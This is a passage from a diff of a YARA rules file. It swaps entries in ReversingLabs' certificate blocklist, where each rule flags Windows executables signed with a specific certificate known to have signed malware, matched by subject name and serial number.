"8c96fbd10672b0b258a80f3abaf0320540c5ff0a4636f011cfe7cfa8ccc482d0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9784-L9802" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f5e3c16f6caaf5f3152d90dc48895d0bbcdb296c368beeebb96157f03a8ded40" score = 75 quality = 90 tags = "INFO, FILE" @@ -21837,22 +41628,22 @@ rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IBM" and pe.signatures[i].serial=="30:76:42:e1:f3:a9:2c:6c:c2:e7:fb:6e:18:f2:dd:cb" and 1500422400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sopiteks LLC" and (pe.signatures[i].serial=="00:a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" or pe.signatures[i].serial=="a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86") and 1631908320<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "478994c1-c1c4-5f11-b78f-fe237b687bef" + id = "ce30ace6-c2c2-5f3e-a2f7-1f08825d44eb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15684-L15700" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "245e994024e08add755ec704b895286c115ac00eb5aeecde98fce96f35f6e9e0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9804-L9820" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7d7dd55eaab15cf458e5e57f0e5fbebdcc9313aee05394310a5cf9d9b4def153" score = 75 quality = 90 tags = "INFO, FILE" @@ -21862,22 +41653,22 @@ rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="52:37:91:31:a1:c6:92:63:c7:95:a7:d3:98:db:09:97" and 1476748800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lpr:n Laatu-Ravintolat Oy" and pe.signatures[i].serial=="33:84:83:cc:17:4c:16:eb:c4:54:a3:80:3f:fd:42:17" and 1635208206<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9bc1a8f4-36b7-52bd-9a65-fcd8ec2acf92" + id = "3ff8149b-4a90-5593-b12a-d815b04fce7e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15702-L15718" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8e34636ed815812af478dd01eacd5298fa2cfeb420ee2f45e055f557534cae71" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9822-L9840" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "348df24620bfe6322c410cb593f5caad67492b0b5af234ee89b0411beb4b48f9" score = 75 quality = 90 tags = "INFO, FILE" @@ -21887,22 +41678,22 @@ rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BEAR ADAMS CONSULTING LIMITED" and pe.signatures[i].serial=="44:31:2c:b9:a9:27:b4:11:13:60:76:2b:4d:4b:dd:6d" and 1554768000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Argus Security Maintenance Systems Inc." and (pe.signatures[i].serial=="00:be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c" or pe.signatures[i].serial=="be:89:93:6c:26:cd:0d:84:50:74:f6:b7:b4:7f:48:0c") and 1634235015<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0F20A5155E53Ce20Bb644F646Ed6A2Fd : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "601ddd98-8cd5-5c52-a59a-d4a0556fc316" + id = "d52066d5-9bc1-5f72-8e97-7efda88c14b2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15720-L15736" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f55835c7404edab96bc5c8fe3844f3380f1f6bc8b43da1d51213de899629e8f5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9842-L9858" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "70d57f2c24d4ae6f17339bfb998589a3b10f5dd4b19ac8a5bc99e082145c4ed0" score = 75 quality = 90 tags = "INFO, FILE" @@ -21912,22 +41703,22 @@ rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="12:3a:50:74:06:91:62:f4:ed:68:fc:7d:48:f4:64:c2" and 1472428800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CB CAM SP Z O O" and pe.signatures[i].serial=="0f:20:a5:15:5e:53:ce:20:bb:64:4f:64:6e:d6:a2:fd" and 1635196200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5f4da614-3bc8-5ae8-b04b-e4b3972522ff" + id = "8e059a2a-c436-5247-b395-a2f594c1c9a9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15738-L15754" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "03adb8a9bf2a8f0633b34d5c39816b47e60b9e598208f7de79ad9d9a7ab8cc5e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9860-L9878" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a18d1c1e5e22c1aa041a4b2d23d2aefcbedbd3517a079d578e1a143ecadb4533" score = 75 quality = 90 tags = "INFO, FILE" @@ -21937,22 +41728,22 @@ rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOV \"MARIYA\"" and pe.signatures[i].serial=="64:eb:04:b8:de:f3:82:b5:ef:a7:5f:63:e0:e8:5a:d0" and 1535587200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Postmarket LLC" and (pe.signatures[i].serial=="00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures[i].serial=="ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e") and 1635153791<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f7eae73e-6b12-5507-846e-d3b409243adf" + id = "63938a97-2cb3-52b0-9717-c8949e3fae46" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15756-L15772" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "87f9930967d5832d3003672eeb89669b54feed1ca2ea5eec478c50e3cb7a7571" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9880-L9898" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "69b9012fc4ab9636d159de49ff452f054030c1157cf70a95512b2a0748dad7c0" score = 75 quality = 90 tags = "INFO, FILE" @@ -21962,22 +41753,22 @@ rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="76:d8:d9:08:ee:d2:f9:85:7d:c5:67:6a:68:0c:ea:c9" and 1467158400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fjordland Bike Wear ApS" and (pe.signatures[i].serial=="00:ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" or pe.signatures[i].serial=="ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26") and 1636145940<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b9a1b1a7-2333-5a6f-85c9-6c19d34c4aa4" + id = "50cc539a-1f00-566d-a83f-b4d8459506d8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15774-L15790" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6977d48a2e31235d780cba1b84b39a90e409ee8ea5555e01cbc34989ecd3882d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9900-L9918" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d37e1d94048339a86b8fa173d3ab753fc5e79329b73df9fda5815cd622c57745" score = 75 quality = 90 tags = "INFO, FILE" @@ -21987,22 +41778,22 @@ rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Telefonicasa" and pe.signatures[i].serial=="08:3e:3f" and 999002664<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "XL-FORCE ApS" and (pe.signatures[i].serial=="00:cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" or pe.signatures[i].serial=="cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62") and 1636111842<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "350f7c25-f20f-5e8f-aa52-163cf3de3be1" + id = "a72a0001-a272-506d-b610-c028ed8ac6da" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15792-L15808" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "73e920d51faf7150329ce189d1693c29a2285a02d54fee27e5af5afe3238295b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9920-L9938" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "33a05d46b40ffdf49bfa5facca41ebdf6bedcabc1cb1f5b9bf2d043ad1c869b0" score = 75 quality = 90 tags = "INFO, FILE" @@ -22012,22 +41803,22 @@ rule REVERSINGLABS_Cert_Blocklist_79227311Acdd575759198Dbd3544Cca7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="79:22:73:11:ac:dd:57:57:59:19:8d:bd:35:44:cc:a7" and 1478131200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT, LLC" and (pe.signatures[i].serial=="00:d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" or pe.signatures[i].serial=="d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e") and 1636456620<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "416c5eb3-bc6d-5fb0-a7fe-58cdd6c7c39d" + id = "e5643d08-5957-58b0-8b46-d5e339dfba9c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15810-L15826" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7be892eaf9e2e31442f7ef5ffd296dd17696d6c95d20eb2758ede2c553b05f38" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9940-L9956" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "21c8e8f10d1e4b9eb917c86ac868de2afcd5776a9c1d59149df1d07d8c3e14b9" score = 75 quality = 90 tags = "INFO, FILE" @@ -22037,22 +41828,22 @@ rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="13:ae:38:c9:ae:21:a8:57:6c:0d:02:4d" and 1475062802<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "POLE CLEAN LTD" and pe.signatures[i].serial=="30:54:f9:40:c9:31:ba:d7:b2:38:a2:43:76:c6:a5:cc" and 1637030220<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64db0b43-b73f-594d-9f04-2cdf76df7c9b" + id = "3ffb592c-eec5-51b1-9840-b6b72269fc31" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15828-L15844" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "633e8d6b44d62443d991738fa82b9742ac5634051bba5d0cdb3d6b35d66bdc8f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9958-L9976" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f307a0b598f0876c003aa43db50e024698b6f93931e626c085f98553c14ec2ae" score = 75 quality = 90 tags = "INFO, FILE" @@ -22062,22 +41853,22 @@ rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="55:7b:0a:bf:44:04:58:27:f1:f3:6e:fb:c9:62:71:ec" and 1480291200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EXPRESS BOOKS LTD" and (pe.signatures[i].serial=="00:a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" or pe.signatures[i].serial=="a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b") and 1636971821<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a55bed5b-906f-5c9d-bddd-b4d53d6351de" + id = "2f4a26f2-689a-57bd-8028-d3554e339e60" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15846-L15862" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ad32491b463d0b3b4c85ed78e81bb69802e5f90ae835f73e270b28f02b36f840" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9978-L9994" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2377eeb5316d25752443735e78d0ad7de398a2677f5a0fd45fd6e6c87720d49b" score = 75 quality = 90 tags = "INFO, FILE" @@ -22087,22 +41878,22 @@ rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Qool Aid, LLC" and pe.signatures[i].serial=="79:03:87:01:84:e1:8a:80:89:97:40:84:5a:15:e2:b2" and 1079654400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ULTRA ACADEMY LTD" and pe.signatures[i].serial=="38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" and 1637141034<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "129e981a-064a-5930-bd45-d03ed008451c" + id = "b557864d-c573-5789-9959-8df3036d5ac5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15864-L15880" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8b7340359778e3aa56f6ea300973af74eb77efd54108d2ca2b6b8f04d89a1c39" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9996-L10012" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bc3ef217455b74900cae114d25b02325d2bef25c11873342df1dd2369cbce76a" score = 75 quality = 90 tags = "INFO, FILE" @@ -22112,22 +41903,22 @@ rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="5f:ba:9b:37:3f:81:2c:16:ae:f5:31:d4" and 1473329076<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Affairs-case s.r.o." and pe.signatures[i].serial=="29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" and 1638832273<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "09e9e481-c767-53d3-9af1-11dec636cafb" + id = "620c04df-e613-5319-aa00-646c7e0c8031" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15882-L15898" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "463ccd3ace9021569a7a6d5fcbaadf34b15d2b07baf3df526b271b547cf2bbc5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10014-L10030" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24bee3563e0867ef6702e7f57bbce7075f766410650ae5ce1e2e8c7b14a3eaca" score = 75 quality = 90 tags = "INFO, FILE" @@ -22137,22 +41928,22 @@ rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lerges" and pe.signatures[i].serial=="61:6a:52:05:23:85:90:b0:1d:7b:76:1e:44:4e:4a:d9" and 1421452800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MACHINES SATU MARE SRL" and pe.signatures[i].serial=="5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" and 1638390070<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a2dfd6e0-4475-537a-859e-126dd4a02af7" + id = "6678bd73-bf4d-5576-8bf2-b721ee288da7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15900-L15916" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3df7afba9eda9022a64647ce2a91119d0bdf6fe5b164a1e82b1819409024fbee" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10032-L10048" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "27610bb3bf069991803611474abf44a3bf82fc9283d0412a1c24ae46a3f5352e" score = 75 quality = 90 tags = "INFO, FILE" @@ -22162,22 +41953,22 @@ rule REVERSINGLABS_Cert_Blocklist_29Be2278113Dd062Eadca32De6B242D0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BLADES" and pe.signatures[i].serial=="29:be:22:78:11:3d:d0:62:ea:dc:a3:2d:e6:b2:42:d0" and 1536883200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TechnoElek s.r.o." and pe.signatures[i].serial=="0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" and 1638372946<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9ce5b6c7-fede-508f-a7d0-f9d0b8838645" + id = "37e60515-0395-51a5-8bfa-35e3e336d60c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15918-L15934" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = 